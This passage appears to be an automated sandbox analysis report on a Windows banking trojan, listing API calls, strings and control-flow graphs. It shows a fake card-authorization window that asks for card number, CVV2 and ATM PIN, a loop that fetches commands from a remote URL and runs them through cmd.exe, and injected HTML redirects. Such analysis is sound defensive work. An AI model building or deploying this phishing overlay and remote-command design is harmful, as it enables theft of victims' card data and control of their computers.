                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 310 40570c-405743 call 4079e4 GetTempPathA 313 405746-40574b 310->313 313->313 314 40574d-405796 call 4015ea strcat sprintf rand 313->314 317 405798-4057a9 strcat 314->317 318 4057ac-4057bc rand 314->318 317->318 319 4057e7-4057f7 rand 318->319 320 4057be-4057e4 rand sprintf 318->320 321 4057f9-40580a strcat 319->321 322 40580d-405837 strcat rand 319->322 320->319 321->322 323 405839-40584a strcat 322->323 324 40584d-40585d rand 322->324 323->324 325 405888-4058c1 sprintf rand 324->325 326 40585f-405885 rand sprintf 324->326 327 4058c3-4058d4 strcat 325->327 328 4058d7-4058fb strcat rand 325->328 326->325 327->328 329 405911-40593b strcat rand 328->329 330 4058fd-40590e strcat 328->330 331 405966-40598a strcat rand 329->331 332 40593d-405963 rand sprintf 329->332 330->329 333 4059a0-4059d0 strcat rand 331->333 334 40598c-40599d strcat 331->334 332->331 335 4059d2-4059e3 strcat 333->335 336 4059e6-405a0a strcat rand 333->336 334->333 335->336 337 405a20-405a5a sprintf rand 336->337 338 405a0c-405a1d strcat 336->338 339 405a70-405a9a strcat rand 337->339 340 405a5c-405a6d strcat 337->340 338->337 341 405ab0-405af1 rand sprintf rand 339->341 342 405a9c-405aad strcat 339->342 340->339 343 405af3-405b04 strcat 341->343 344 405b07-405b37 strcat rand 341->344 342->341 343->344 345 405b39-405b4a strcat 344->345 346 405b4d-405b5d rand 344->346 345->346 347 405b88-405c08 strcat CreateFileA lstrlenA WriteFile CloseHandle 346->347 348 405b5f-405b85 rand sprintf 346->348 348->347
                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 382 4068b0-4068c1 383 4068c7-4068e1 call 405f5b 382->383 386 4068e7-40690f call 403619 383->386 387 406c0c-406c1d _sleep 383->387 390 406be1-406bfb call 4043bf 386->390 391 406915 386->391 387->383 394 406c01-406c07 LocalFree 390->394 395 40691a-406921 390->395 391->387 394->387 395->390 396 406927-40692e 395->396 397 406934-40693b 396->397 398 406a66-406a7e call 40143b 396->398 397->398 400 406941-406970 sscanf 397->400 398->390 404 406a84-406aa7 atoi 398->404 402 406972-406995 rand 400->402 403 40699b-4069a2 400->403 402->390 402->403 405 4069a4-4069d9 sprintf * 2 403->405 406 4069db-406a24 GetWindowsDirectoryA sprintf strcat 403->406 404->390 407 406aad-406aef sprintf call 407a04 lstrlenA 404->407 408 406a27-406a61 DeleteFileA sprintf WinExec 405->408 406->408 411 406b17-406b1e 407->411 408->398 412 406b20-406bdc sprintf lstrlenA * 2 LocalAlloc call 407a04 lstrlenA call 407a04 CreateThread CloseHandle 411->412 413 406af1-406aff 411->413 412->390 414 406b11 413->414 415 406b01-406b0f 413->415 414->411 415->412
                            APIs
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?), ref: 00405F73
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,?), ref: 00405F7E
                              • Part of subcall function 00405F5B: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F5B: DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                              • Part of subcall function 00405F5B: CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                              • Part of subcall function 00405F5B: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                              • Part of subcall function 00405F5B: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                              • Part of subcall function 00405F5B: CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            • sscanf.CRTDLL(0000003A,:%02u,?), ref: 0040695B
                            • rand.CRTDLL ref: 00406972
                            • sprintf.CRTDLL(?,%s\cmd.pif,00429080), ref: 004069B5
                            • sprintf.CRTDLL(?,%s\cmd.exe,00429080,?,%s\cmd.pif,00429080), ref: 004069D1
                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 004069E7
                            • sprintf.CRTDLL(?,%s\command.pif,?,?,00000400), ref: 00406A0E
                            • strcat.CRTDLL(?,\command.com,?,%s\command.pif,?,?,00000400), ref: 00406A1F
                            • DeleteFileA.KERNEL32(?,?,?,?,?,00000400), ref: 00406A2E
                            • sprintf.CRTDLL(?,%s /C %s,?,00000036,?,?,?,?,?,00000400), ref: 00406A50
                            • WinExec.KERNEL32(?,00000000), ref: 00406A61
                            • atoi.CRTDLL(00000035), ref: 00406A8E
                            • sprintf.CRTDLL(?,%s\Rtdx1%i.dat,00429080,0000000C), ref: 00406AC4
                            • lstrlenA.KERNEL32(?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406AE4
                            • sprintf.CRTDLL(0000002F,%s/Rtdx1%i.htm,0000002F,0000000C,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B45
                            • lstrlenA.KERNEL32(?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B54
                            • lstrlenA.KERNEL32(0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B66
                            • LocalAlloc.KERNEL32(00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B78
                            • lstrlenA.KERNEL32(?,?,?,00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406BA2
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000686C,?,00000000,0000000C), ref: 00406BD6
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_0000686C,?,00000000,0000000C,?,0000002F,?,?,?,00000040,?,0000002F,?), ref: 00406BDC
                            • LocalFree.KERNEL32(?,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406C07
                            • _sleep.CRTDLL(001B7740), ref: 00406C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$sprintf$LocalThread$AllocCloseCreateDeleteHandle$CacheCodeDirectoryEntryExecExitFileFreeObjectSingleWaitWindows_sleepatoirandsscanfstrcat
                            • String ID: %s /C %s$%s/Rtdx1%i.htm$%s\Rtdx1%i.dat$%s\cmd.exe$%s\cmd.pif$%s\command.pif$/$:$:$:%02u$\command.com$http://tat-neftbank.ru/wcmd.htm$wupd
                            • API String ID: 4275340860-3363018154
                            • Opcode ID: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction ID: 18f08bfc30c9890c11dd244c38850a50baba5aa484248b9ca7ce56826a71177a
                            • Opcode Fuzzy Hash: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction Fuzzy Hash: 328163B1E08228ABDB21A6658D46BD977BCDB04304F5105F7E60CB21C1E67C7F948F99
                            APIs
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052F8
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?), ref: 0040530B
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?), ref: 0040532C
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040539F
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053B2
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053D4
                            • Sleep.KERNEL32(00007800,00000000,00000000,00000044,?), ref: 00405426
                            • Sleep.KERNEL32(0000F000,00007800,00000000,00000000,00000044,?), ref: 00405439
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405451
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405499
                            • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054A5
                            • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054B2
                            • CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessSleepThreadstrcat$CreateCurrentDeleteDesktopFileFreeLocalTerminateTextWindowmemsetsprintf
                            • String ID: %s%u - Microsoft Internet Explorer$D$MicroSoft-Corp$X-okRecv11$\Iexplore.exe
                            • API String ID: 1202517094-2261298365
                            • Opcode ID: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction ID: a5954b523feb805065d44168e487e19d6cbd8b1c6e851fe6a795fce517e83f05
                            • Opcode Fuzzy Hash: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction Fuzzy Hash: 4F416572E442186ADB20AA65CC46BDDB3B99F50305F1444F7E208F61D1DABCAEC48F59
                            APIs
                            • SysAllocString.OLEAUT32(value), ref: 00401BCC
                              • Part of subcall function 004017AC: CoInitialize.OLE32(00000000), ref: 004017CC
                              • Part of subcall function 004017AC: CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
